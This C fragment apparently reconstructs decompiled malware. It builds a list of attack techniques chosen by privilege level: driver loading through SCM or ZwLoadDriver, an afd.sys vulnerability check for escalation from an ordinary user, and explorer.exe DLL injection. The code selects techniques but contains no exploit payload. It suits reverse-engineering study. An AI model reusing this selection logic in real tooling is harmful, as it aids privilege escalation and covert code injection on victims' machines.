/*
 * One entry of the technique list built by Avtr_setup_list (doubly linked
 * through next/prev). The offsets in the comments are those of the
 * reconstructed 32-bit layout (technique sits at 0x08, so the two pointers
 * occupy 0x00..0x07); the field order must not be changed.
 */
struct _avtr_listelem
{
    struct _avtr_listelem *next;   /* 0x00 */
    struct _avtr_listelem *prev;   /* 0x04 */
    DWORD technique;               /* 0x08: technique id (0x80000000 / 0x80000001 seen in Avtr_setup_list) */
    DWORD privilege_value;         /* 0x0C: privilege value the entry is tagged with (1, 2, 0x80000002 seen) */
    DWORD n_tries;                 /* 0x10: always set to 1 by Avtr_setup_list */
    DWORD milliseconds;            /* 0x14: always set to 30000 by Avtr_setup_list; presumably a timeout — confirm in the consumer */
};
typedef struct _avtr_listelem avtr_listelem;
typedef avtr_listelem *pavtr_listelem;
/* Head of the technique list; stays NULL until Avtr_setup_list appends the
   first entry (static storage, so the explicit initializer changes nothing). */
pavtr_listelem gList = NULL;
/* Element count of gList; its address is handed to List_appendElem, which
   presumably increments it on every successful append. */
int gElemCount = 0;
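/*
 * Append one entry to gList and fill in its fields.
 *
 * The original listing repeated this sequence three times; wrapping it fixes
 * two defects of that listing: the sizeof operand was misspelled
 * ("avtr_listeelem", which does not name the struct), and the third copy
 * dereferenced the List_appendElem result without a NULL check. n_tries and
 * milliseconds are the same constants (1, 30000) for every entry.
 *
 * @param technique        technique id stored in the entry
 * @param privilege_value  privilege value stored in the entry
 * @return the new entry, or NULL when List_appendElem failed (nothing queued)
 */
static pavtr_listelem Avtr_add_elem(DWORD technique, DWORD privilege_value)
{
    pavtr_listelem Elem = List_appendElem(&gList, sizeof(avtr_listelem), &gElemCount, hHeap);
    if (!Elem) {
        return NULL;
    }
    /* The original sets the head itself when the list was still empty;
       keep that even though List_appendElem receives &gList. */
    if (!gList) {
        gList = Elem;
    }
    Elem->technique = technique;
    Elem->privilege_value = privilege_value;
    Elem->n_tries = 1;
    Elem->milliseconds = 30000;
    return Elem;
}

/*
 * Reconstructed setup of the global technique list (gList / gElemCount).
 * Each branch below queues one avtr_listelem describing a technique and the
 * privilege value it is tagged with; the list is consumed elsewhere (not in
 * this listing).
 *
 * Relies on names defined outside this block: IsAdmin,
 * ServicePackMajor_defined, hHeap, List_appendElem, Avtr_isVulnerable.
 *
 * @return TRUE when at least one entry was queued, FALSE otherwise
 */
BOOL Avtr_setup_list(void)
{
    if (IsAdmin) {
        /* 0x80000000 — "SCM or ZwLoadDriver" per the original annotation;
           privilege value 2 — Administrator. */
        Avtr_add_elem(0x80000000, 2);
    }

    if (Avtr_isVulnerable("afd.sys", 2011, 10)) {
        /* Same technique id as above in the reconstruction, annotated
           "afd.sys vulnerability"; privilege value 1 — ordinary user.
           Presumably the consumer distinguishes the two entries by
           privilege_value — confirm against the code that walks gList. */
        Avtr_add_elem(0x80000000, 1);
    }

    /* 0x80000001 — explorer.exe DLL injection. Queued as Administrator when
       IsAdmin, otherwise only on "Vista and above" (original annotation for
       the ServicePackMajor_defined >= 8 test) with privilege value
       0x80000002; on older systems nothing more is queued. */
    if (IsAdmin) {
        Avtr_add_elem(0x80000001, 2);
    } else if (ServicePackMajor_defined >= 8) {
        Avtr_add_elem(0x80000001, 0x80000002);
    }

    return (gElemCount > 0);
}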